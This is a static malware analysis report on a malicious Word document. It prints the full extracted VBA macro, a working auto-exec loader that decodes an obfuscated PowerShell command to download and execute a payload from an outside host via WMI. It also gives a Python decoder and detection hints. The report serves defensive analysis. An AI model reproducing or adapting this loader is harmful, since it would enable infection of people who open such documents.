Malicious Office (OOXML) — malware analysis report

Static analysis result for SHA-256 6fbf97ccf59de2ec…

MALICIOUS

Office (OOXML)

Size: 22.3 KB
Created: 2021-09-28 08:25:00 UTC
Authoring application: Microsoft Office Word 16.0000
First seen: 2021-10-01
MD5: 0750cdec3fbe808ebc2803130d173b50
SHA-1: a1c4c51c7450891cb84cbf0dfbe713c4ff604aae
SHA-256: 6fbf97ccf59de2eccd256f25bc506ecb9000749a05d7db022e83743a6e7f2a8a
Risk Score: 244

Heuristics (8)

  • VBA project inside OOXML medium 5 related findings OOXML_VBA
    Document contains a VBA project — VBA macros present
  • Obfuscated auto-exec VBA loader critical OLE_VBA_OBFUSCATED_AUTOEXEC_LOADER
    Auto-exec VBA reconstructs strings with a heavy custom decoder (numeric char-array, repeated hex-string decode, or junk-token Replace removal) and feeds them to a COM-instantiation or execution sink. This obfuscated-loader shape keeps CreateObject/Shell/URL indicators out of the macro source.
  • AutoOpen macro high OLE_VBA_AUTOOPEN
    AutoOpen is a legacy auto-exec procedure name that Word runs when the document is opened; in this sample it only calls Test.
  • Document_Open macro high OLE_VBA_DOCOPEN
    Document_Open is the ThisDocument open event handler; it also calls Test, so the loader fires under either mechanism.
  • GetObject call high OLE_VBA_GETOBJ
    GetObject with a moniker can bind to WMI. Here the moniker (winmgmts:) and the class name (Win32_Process) are both StrReverse'd literals, and Win32_Process.Create launches the decoded command from WmiPrvSE.exe rather than as a child of WINWORD.EXE, which sidesteps "Office spawned PowerShell" parent-child rules.
  • VBA p-code auto-exec with execution tokens high OLE_VBA_PCODE_AUTOEXEC_EXEC
    Compiled VBA/cache stream contains an auto-execution token together with shell/download/object-execution tokens. This catches p-code-only or source-extraction-failure macro documents where visible source is unavailable.
  • Suspicious extracted artifact info EXTRACTED_FILE_STATIC_TRIAGE
    One or more files extracted from inside this sample matched static suspicious-content checks such as script obfuscation, encoded payload blobs, packed data, or execution/download terms.
  • Embedded URL info EMBEDDED_URL
    One or more URLs were extracted from the document. The URL itself is not a detection — see the per-URL labels for which channel (macro, JS, link annotation, document body, ...) reached each URL.
    All of the extracted URLs are OOXML/DrawingML XML namespace URIs (schemas.microsoft.com, schemas.openxmlformats.org) declared in the document's XML parts; they are not network indicators. The download URL used by the loader is assembled at run time by the macro's numeric decoder and therefore does not appear in this list.
    • http://schemas.microsoft.com/office/word/2010/wordprocessingCanvas (in document text: OOXML body / shared strings)
    • http://schemas.microsoft.com/office/drawing/2014/chartex (in document text: OOXML body / shared strings)
    • http://schemas.microsoft.com/office/drawing/2015/9/8/chartex (in document text: OOXML body / shared strings)
    • http://schemas.microsoft.com/office/drawing/2015/10/21/chartex (in document text: OOXML body / shared strings)
    • http://schemas.microsoft.com/office/drawing/2016/5/9/chartex (in document text: OOXML body / shared strings)
    • http://schemas.microsoft.com/office/drawing/2016/5/10/chartex (in document text: OOXML body / shared strings)
    • http://schemas.microsoft.com/office/drawing/2016/5/11/chartex (in document text: OOXML body / shared strings)
    • http://schemas.microsoft.com/office/drawing/2016/5/12/chartex (in document text: OOXML body / shared strings)
    • http://schemas.microsoft.com/office/drawing/2016/5/13/chartex (in document text: OOXML body / shared strings)
    • http://schemas.microsoft.com/office/drawing/2016/5/14/chartex (in document text: OOXML body / shared strings)
    • http://schemas.openxmlformats.org/markup-compatibility/2006 (in document text: OOXML body / shared strings)
    • http://schemas.microsoft.com/office/drawing/2016/ink (in document text: OOXML body / shared strings)
    • http://schemas.microsoft.com/office/drawing/2017/model3d (in document text: OOXML body / shared strings)
    • http://schemas.openxmlformats.org/officeDocument/2006/relationships (in document text: OOXML body / shared strings)
    • http://schemas.openxmlformats.org/officeDocument/2006/math (in document text: OOXML body / shared strings)
    • http://schemas.microsoft.com/office/word/2010/wordprocessingDrawing (in document text: OOXML body / shared strings)
    • http://schemas.openxmlformats.org/drawingml/2006/wordprocessingDrawing (in document text: OOXML body / shared strings)
    • http://schemas.openxmlformats.org/wordprocessingml/2006/main (in document text: OOXML body / shared strings)
    • http://schemas.microsoft.com/office/word/2010/wordml (in document text: OOXML body / shared strings)
    • http://schemas.microsoft.com/office/word/2012/wordml (in document text: OOXML body / shared strings)
    • http://schemas.microsoft.com/office/word/2018/wordml/cex (in document text: OOXML body / shared strings)
    • http://schemas.microsoft.com/office/word/2016/wordml/cid (in document text: OOXML body / shared strings)
    • http://schemas.microsoft.com/office/word/2018/wordml (in document text: OOXML body / shared strings)
    • http://schemas.microsoft.com/office/word/2015/wordml/symex (in document text: OOXML body / shared strings)
    • http://schemas.microsoft.com/office/word/2010/wordprocessingGroup (in document text: OOXML body / shared strings)
    • http://schemas.microsoft.com/office/word/2010/wordprocessingInk (in document text: OOXML body / shared strings)
    • http://schemas.microsoft.com/office/word/2006/wordml (in document text: OOXML body / shared strings)
    • http://schemas.microsoft.com/office/word/2010/wordprocessingShape (in document text: OOXML body / shared strings)

Extracted artifacts (2)

Files carved from inside the sample during analysis.

Filename: macros.bas
Kind: vba-macro
Source: oletools.olevba.extract_macros (decoded VBA source from OOXML)
Size: 2328 bytes
SHA-256: 3efb9d70b4e91545f9f7e5998cc089c78fb0f1beeea17f01e4e8bd38df1996e7
Preview: first 1,000 lines of the extracted script (the whole file, in this case)
Attribute VB_Name = "ThisDocument"
Attribute VB_Base = "1Normal.ThisDocument"
Attribute VB_GlobalNameSpace = False
Attribute VB_Creatable = False
Attribute VB_PredeclaredId = True
Attribute VB_Exposed = True
Attribute VB_TemplateDerived = True
Attribute VB_Customizable = True

Function ToDec(myString, incrementBy)
    Dim Counter As Integer
    Dim output As String
    For Counter = 1 To Len(myString)
        MyDecimal = Asc(Mid(myString, Counter, 1))
        output = output & " " & MyDecimal
         
    Next
     
    ToDec = output
End Function
 
Function DecToLetter(str As Variant) As String
    Dim tmp As Integer
     
    Length = Len(str)
    For i = 1 To Length
        CH = Mid(str, i, 1)
        If CH Like "[0-9]" Then
            tmp = tmp & CInt(CH)
        End If
    Next i
    DecToLetter = CStr(Chr(tmp))
 
End Function
 
     
Function sSplit(myString, decrementBy)
    Dim output As String
    Dim arr() As String
     
    arr = Split(myString, " ")
       
    Dim letter As Variant
     
    For Each letter In arr
        output = output & DecToLetter(letter)
    Next
     
    sSplit = output
 
End Function

Function random_eggs(eggs)
random_eggs = StrReverse(eggs)
End Function


Private Sub Test()
Dim myString
Dim decstring
decstring = "41 41 41 41 39 116 120 116 46 108 108 101 104 115 114 101 119 111 112 47 51 52 52 58 48 46 51 51 46 56 53 49 46 48 56 47 47 58 112 116 116 104 39 40 103 110 105 114 116 115 100 97 111 108 110 119 111 100 46 41 116 110 101 105 108 99 98 101 119 46 116 101 110 46 109 101 116 115 121 115 32 116 99 101 106 98 111 45 119 101 110 40 40 103 110 105 114 116 83 52 54 101 115 97 66 109 111 114 70 58 58 93 116 114 101 118 110 111 67 46 109 101 116 115 121 83 91 40 103 110 105 114 116 83 116 101 71 46 101 100 111 99 105 110 85 58 58 93 103 110 105 100 111 99 110 69 46 116 120 101 84 46 109 101 116 115 121 83 91 40 120 101 105 32 99 45 32 112 111 110 45 32 115 115 97 112 121 98 32 99 101 120 101 45 32 108 108 101 104 115 114 101 119 111 112"
 

    original = sSplit(decstring, 10)
    
GetObject(random_eggs(":stmgmniw")).Get(random_eggs("ssecorP_23niW")).Create random_eggs(original), Null, Null, pid


End Sub


Sub Document_Open()
Test
End Sub

Sub AutoOpen()
Test
End Sub
Filename: vbaProject_00.bin
Kind: vba-project
Source: OOXML VBA project: word/vbaProject.bin
Size: 25600 bytes
SHA-256: 0690aa68e7fb55d2963172092840b8affd0b7162a10fb1836fba5ddaa7d502b0
Detection
ClamAV: No threats found (no signature match; the verdict rests on the heuristic findings above, not on AV)
Obfuscation or payload: likely
Carved artifact contains 2 long base64-like blob(s).
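Decoding the loader strings. The critical heuristic above says the decoder keeps CreateObject/Shell/URL indicators out of the macro source; the script below recovers them. It is an added example, not part of the analysis pipeline or of the sample: it re-implements the sample's own decoding (sSplit/DecToLetter for the numeric char-array, the random_eggs wrapper around StrReverse) in Python and runs it on the literals copied verbatim from the macros.bas preview above. The regex that recognises a StrReverse wrapper and the list of execution terms are this example's own assumptions, not the report's heuristics. Nothing is fetched from the network.

```python
"""Decode the numeric char-array / StrReverse strings from the macros.bas artifact.

Added example for this report; not part of the analysis pipeline or of the sample.
"""
import re
from typing import Dict, List

# Constructed input: only the literal-bearing lines of macros.bas, copied verbatim
# from the preview above. The sample's own decoder functions are omitted on purpose.
MACRO_SOURCE = r'''
Function random_eggs(eggs)
random_eggs = StrReverse(eggs)
End Function

Private Sub Test()
decstring = "41 41 41 41 39 116 120 116 46 108 108 101 104 115 114 101 119 111 112 47 51 52 52 58 48 46 51 51 46 56 53 49 46 48 56 47 47 58 112 116 116 104 39 40 103 110 105 114 116 115 100 97 111 108 110 119 111 100 46 41 116 110 101 105 108 99 98 101 119 46 116 101 110 46 109 101 116 115 121 115 32 116 99 101 106 98 111 45 119 101 110 40 40 103 110 105 114 116 83 52 54 101 115 97 66 109 111 114 70 58 58 93 116 114 101 118 110 111 67 46 109 101 116 115 121 83 91 40 103 110 105 114 116 83 116 101 71 46 101 100 111 99 105 110 85 58 58 93 103 110 105 100 111 99 110 69 46 116 120 101 84 46 109 101 116 115 121 83 91 40 120 101 105 32 99 45 32 112 111 110 45 32 115 115 97 112 121 98 32 99 101 120 101 45 32 108 108 101 104 115 114 101 119 111 112"
    original = sSplit(decstring, 10)
GetObject(random_eggs(":stmgmniw")).Get(random_eggs("ssecorP_23niW")).Create random_eggs(original), Null, Null, pid
End Sub
'''

# A string literal made of at least nine space-separated small integers.
NUMERIC_ARRAY = re.compile(r'"((?:\d{1,3}\s+){8,}\d{1,3})"')
# "Function f(x)" followed by "f = StrReverse(x)": a one-line wrapper hiding StrReverse.
# Assumption of this example; the real heuristics may match differently.
STRREVERSE_WRAPPER = re.compile(
    r'Function\s+(\w+)\s*\(\s*(\w+)\s*\)\s+\1\s*=\s*StrReverse\s*\(\s*\2\s*\)', re.I)
URL = re.compile(r"https?://[^\s'\"()]+", re.I)
EXEC_TERMS = ("powershell", "iex", "downloadstring", "frombase64string",
              "winmgmts:", "win32_process", "wscript.shell", "cmd.exe")


def decode_numeric_array(literal: str) -> str:
    """Mirror sSplit()/DecToLetter(): split on blanks, keep only the digits of each
    token, and turn every number into one character."""
    chars = []
    for token in literal.split():
        digits = "".join(ch for ch in token if ch.isdigit())
        if digits:
            chars.append(chr(int(digits)))
    return "".join(chars)


def find_reversed_literals(vba: str) -> List[str]:
    """Return, already un-reversed, every string literal passed to StrReverse()
    or to a wrapper around it (random_eggs in this sample)."""
    names = ["StrReverse"] + [m.group(1) for m in STRREVERSE_WRAPPER.finditer(vba)]
    call = re.compile(r'(?:%s)\s*\(\s*"([^"]*)"\s*\)' % "|".join(map(re.escape, names)), re.I)
    return [m.group(1)[::-1] for m in call.finditer(vba)]


def analyze(vba: str) -> Dict[str, object]:
    """Decode every numeric array in both orientations, keep the ones that read as
    a command, and collect the URLs and the execution sink they reveal."""
    commands = []
    for m in NUMERIC_ARRAY.finditer(vba):
        plain = decode_numeric_array(m.group(1))
        for variant in (plain, plain[::-1]):      # this loader reverses after decoding
            if any(t in variant.lower() for t in EXEC_TERMS):
                commands.append(variant)
    reversed_literals = find_reversed_literals(vba)
    lowered = {s.lower() for s in reversed_literals}
    sink = None
    if "winmgmts:" in lowered and "win32_process" in lowered:
        sink = "WMI Win32_Process.Create"      # child of WmiPrvSE.exe, not WINWORD.EXE
    text = " ".join(commands + reversed_literals)
    return {
        "commands": commands,
        "reversed_literals": reversed_literals,
        "urls": sorted(set(URL.findall(text))),
        "sink": sink,
    }


if __name__ == "__main__":
    result = analyze(MACRO_SOURCE)
    for cmd in result["commands"]:
        print("command :", cmd)
    print("urls    :", result["urls"])
    print("sink    :", result["sink"])
```

Run against the embedded literals this recovers a single powershell -exec bypass -nop one-liner that fetches a base64 blob with System.Net.WebClient.DownloadString over plain HTTP on port 443, decodes it as UTF-16 and hands it to iex, plus the two StrReverse'd literals winmgmts: and Win32_Process. Two things follow for detection: the host and URL in the decoded string are the only real network indicators in this sample (the schema URIs listed under Embedded URL are noise), and because the sink is Win32_Process.Create, the PowerShell process is created by WmiPrvSE.exe, so hunt for WmiPrvSE.exe spawning powershell.exe with -exec bypass -nop shortly after WINWORD.EXE opened the document, rather than relying on an Office-to-PowerShell parent-child rule.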